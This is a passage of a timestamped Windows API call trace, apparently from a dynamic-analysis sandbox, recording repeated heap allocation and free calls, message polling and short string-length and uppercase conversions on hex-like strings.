[0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edba0 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f48 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d960 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edca8 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ee8 [0083.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edca8 | out: hHeap=0x2af0000) returned 1 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6daf0 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edbe8 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edc00 [0083.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6d7d0 | out: hHeap=0x2af0000) returned 1 [0083.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e18 | out: hHeap=0x2af0000) returned 1 [0083.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb70 | out: hHeap=0x2af0000) returned 1 [0083.724] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d730 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb70 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e18 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd68 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f58 [0083.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f58 | out: hHeap=0x2af0000) returned 1 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e68 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd98 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eddc8 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e58 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ede28 [0083.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e58 | out: hHeap=0x2af0000) returned 1 [0083.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede28 | out: hHeap=0x2af0000) returned 1 [0083.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddc8 | out: hHeap=0x2af0000) returned 1 [0083.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd98 | out: hHeap=0x2af0000) returned 1 [0083.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e68 | out: hHeap=0x2af0000) returned 1 [0083.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e48 [0083.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e48 | out: hHeap=0x2af0000) returned 1 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0083.725] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e48 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edc18 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ede28 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ed8 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edca8 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd98 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f98 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eddc8 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd20 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71df8 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edcd8 [0083.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71df8 | out: hHeap=0x2af0000) returned 1 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd08 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f68 [0083.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f68 | out: hHeap=0x2af0000) returned 1 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edde0 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f58 [0083.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f58 | out: hHeap=0x2af0000) returned 1 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eddf8 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f58 [0083.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ede58 [0083.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edcd8 | out: hHeap=0x2af0000) returned 1 [0083.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd20 | out: hHeap=0x2af0000) returned 1 [0083.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd08 | out: hHeap=0x2af0000) returned 1 [0083.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edde0 | out: hHeap=0x2af0000) returned 1 [0083.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddc8 | out: hHeap=0x2af0000) returned 1 [0083.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f98 | out: hHeap=0x2af0000) returned 1 [0083.725] lstrlenW (lpString="5B") returned 2 [0083.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddf8 | out: hHeap=0x2af0000) returned 1 [0083.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f58 | out: hHeap=0x2af0000) returned 1 [0083.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede58 | out: hHeap=0x2af0000) returned 1 [0083.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd98 | out: hHeap=0x2af0000) returned 1 [0083.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edca8 | out: hHeap=0x2af0000) returned 1 [0083.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ed8 | out: hHeap=0x2af0000) returned 1 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ede58 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd08 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ed8 [0083.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede28 | out: hHeap=0x2af0000) returned 1 [0083.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edc18 | out: hHeap=0x2af0000) returned 1 [0083.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e48 | out: hHeap=0x2af0000) returned 1 [0083.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd08 | out: hHeap=0x2af0000) returned 1 [0083.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ed8 | out: hHeap=0x2af0000) returned 1 [0083.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede58 | out: hHeap=0x2af0000) returned 1 [0083.726] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.726] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71df8 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd08 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edc18 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e48 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd98 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eddf8 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71dc8 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eddc8 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edca8 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ed8 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edcd8 [0083.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ed8 | out: hHeap=0x2af0000) returned 1 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd20 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ed8 [0083.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ed8 | out: hHeap=0x2af0000) returned 1 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edde0 [0083.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f58 [0083.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f58 | out: hHeap=0x2af0000) returned 1 [0083.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ede28 [0083.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f98 [0083.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ede58 [0083.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edcd8 | out: hHeap=0x2af0000) returned 1 [0083.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edca8 | out: hHeap=0x2af0000) returned 1 [0083.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd20 | out: hHeap=0x2af0000) returned 1 [0083.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edde0 | out: hHeap=0x2af0000) returned 1 [0083.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddc8 | out: hHeap=0x2af0000) returned 1 [0083.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71dc8 | out: hHeap=0x2af0000) returned 1 [0083.727] lstrlenW (lpString="5C") returned 2 [0083.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede28 | out: hHeap=0x2af0000) returned 1 [0083.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f98 | out: hHeap=0x2af0000) returned 1 [0083.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede58 | out: hHeap=0x2af0000) returned 1 [0083.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddf8 | out: hHeap=0x2af0000) returned 1 [0083.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd98 | out: hHeap=0x2af0000) returned 1 [0083.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e48 | out: hHeap=0x2af0000) returned 1 [0083.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edca8 [0083.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd20 [0083.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ed8 [0083.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edc18 | out: hHeap=0x2af0000) returned 1 [0083.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd08 | out: hHeap=0x2af0000) returned 1 [0083.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71df8 | out: hHeap=0x2af0000) returned 1 [0083.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd20 | out: hHeap=0x2af0000) returned 1 [0083.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ed8 | out: hHeap=0x2af0000) returned 1 [0083.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edca8 | out: hHeap=0x2af0000) returned 1 [0083.740] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.740] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ed8 [0083.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71dc8 | out: hHeap=0x2af0000) returned 1 [0083.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e48 | out: hHeap=0x2af0000) returned 1 [0083.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f58 | out: hHeap=0x2af0000) returned 1 [0083.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd20 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd98 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddc8 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edc18 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd08 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71da8 | out: hHeap=0x2af0000) returned 1 [0083.741] lstrlenW (lpString="5C") returned 2 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edde0 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e48 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede58 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddf8 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edcd8 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f98 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edca8 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede28 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ed8 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd08 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f58 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edcd8 | out: hHeap=0x2af0000) returned 1 [0083.741] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.741] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e58 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e68 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f68 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddf8 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edcd8 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd98 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd20 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede58 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f58 | out: hHeap=0x2af0000) returned 1 [0083.741] lstrlenW (lpString="2F") returned 2 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddc8 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ed8 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edde0 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edc18 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede28 | out: hHeap=0x2af0000) returned 1 [0083.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71dc8 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edca8 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd08 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71df8 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edcd8 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71dc8 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edc18 | out: hHeap=0x2af0000) returned 1 [0083.742] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.742] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f98 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f98 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f98 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd20 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd08 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddc8 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edde0 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edcd8 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ed8 | out: hHeap=0x2af0000) returned 1 [0083.742] lstrlenW (lpString="5D") returned 2 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede28 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f98 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede58 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd98 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edc18 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f68 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddf8 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edca8 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f58 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd98 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f68 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddc8 | out: hHeap=0x2af0000) returned 1 [0083.742] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.742] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ed8 | out: hHeap=0x2af0000) returned 1 [0083.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e58 | out: hHeap=0x2af0000) returned 1 [0083.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f58 | out: hHeap=0x2af0000) returned 1 [0083.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd20 | out: hHeap=0x2af0000) returned 1 [0083.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd08 | out: hHeap=0x2af0000) returned 1 [0083.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edde0 | out: hHeap=0x2af0000) returned 1 [0083.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddf8 | out: hHeap=0x2af0000) returned 1 [0083.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edcd8 | out: hHeap=0x2af0000) returned 1 [0083.743] lstrlenW (lpString="2B") returned 2 [0083.743] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.743] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.743] lstrlenW (lpString="5C") returned 2 [0083.743] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.743] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.743] lstrlenW (lpString="7A") returned 2 [0083.743] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.743] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.743] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.743] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.743] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.743] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.743] lstrlenW (lpString="5C") returned 2 [0083.743] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.743] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, 